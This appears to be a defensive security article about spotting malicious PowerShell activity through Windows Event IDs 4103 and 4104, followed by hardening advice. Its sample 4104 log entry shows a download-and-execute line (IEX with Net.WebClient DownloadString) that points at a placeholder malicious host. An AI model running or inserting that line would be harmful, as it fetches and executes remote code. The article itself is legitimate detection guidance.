PowerShell is a widely used command-line tool in Windows environments, providing administrators with powerful automation, configuration management, and system control capabilities. However, these same capabilities make it an attractive tool for threat actors seeking to execute malicious commands, evade detection, and maintain persistence within a compromised network. By analyzing Windows Security Event Logs—particularly Event IDs 4103 and 4104—security teams can identify and mitigate potential threats before they escalate.

Why Do Threat Actors Use PowerShell?

PowerShell is a preferred tool for cybercriminals due to its:

• Native Integration: PowerShell is built into Windows, reducing the need for attackers to introduce foreign executables that might trigger security alerts.
• In-Memory Execution: Malicious PowerShell scripts can run directly in memory, avoiding disk-based detection by traditional antivirus solutions.
• Obfuscation Capabilities: Attackers can encode or obfuscate PowerShell commands to bypass security defenses and logging mechanisms.
• System Control & Reconnaissance: PowerShell provides deep access to system components, allowing attackers to gather intelligence, manipulate system configurations, and move laterally within a network.

Windows Security Event ID 4103: PowerShell Module Logging

Event ID 4103 is generated when PowerShell module logging is enabled, capturing details about executed commands and scripts. This log provides insights into PowerShell activities, including:

• Executed Modules: Identifies which PowerShell modules are being used, potentially revealing malicious intent (e.g., Mimikatz, PowerView).
• Obfuscated Commands: Detects encoded or obfuscated scripts attempting to bypass security controls.
• Unexpected Administrative Actions: Flags unauthorized use of administrative PowerShell commands that could indicate privilege escalation or unauthorized access.

Example of a Suspicious 4103 Log Entry:

HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Enc SQB... (Base64 Encoded Command)

A Base64-encoded command like the one above may indicate an attacker is attempting to evade detection while executing malicious scripts.

Windows Security Event ID 4104: PowerShell Script Block Logging

Event ID 4104 captures detailed information about executed PowerShell script blocks, including fully expanded and de-obfuscated commands. This makes it particularly useful for:

• Detecting Malicious Code Execution: Identifies scripts executing suspicious commands, such as downloading payloads or disabling security controls.
• Uncovering Obfuscation Techniques: Reveals attackers’ attempts to mask their true intentions by encoding or fragmenting scripts.
• Tracking Attack Progression: Provides insight into how an attacker is interacting with the environment over time.

Example of a Malicious 4104 Log Entry:

ScriptBlockText=IEX (New-Object Net.WebClient).DownloadString('http://malicious.com/payload.ps1')

This log entry indicates an attempt to download and execute a remote PowerShell script, a common tactic used in malware deployment and post-exploitation activities.

How Event IDs 4103 and 4104 Uncover Malicious Activity

By monitoring and correlating Event IDs 4103 and 4104, security teams can:

• Identify Attack Techniques: Detect attempts to download remote payloads, escalate privileges, or disable security mechanisms.
• Correlate Suspicious Activities: Link script executions with other system events to determine whether an attack is underway.
• Mitigate Threats Proactively: Alert on abnormal PowerShell usage, automatically flagging or blocking known attack patterns.

Defensive Measures Against PowerShell-Based Attacks

To reduce the risk of PowerShell exploitation, organizations should:

• Enable Logging: Ensure PowerShell Module Logging (Event ID 4103) and Script Block Logging (Event ID 4104) are turned on.
• Implement Constrained Language Mode: Restrict PowerShell’s ability to execute advanced scripts unless explicitly authorized.
• Monitor and Analyze Logs: Use SIEM solutions to detect, alert, and respond to anomalous PowerShell activity.
• Restrict PowerShell Access: Limit PowerShell usage to necessary personnel and enforce execution policies.

Conclusion

Threat actors rely on PowerShell due to its powerful capabilities and stealthy execution methods. However, by proactively monitoring Windows Security Event IDs 4103 and 4104, organizations can uncover malicious activity, analyze threat actor tactics, and respond before significant damage occurs. Strengthening PowerShell security policies and implementing continuous monitoring will significantly reduce the risk of exploitation and improve an organization’s overall cybersecurity resilience.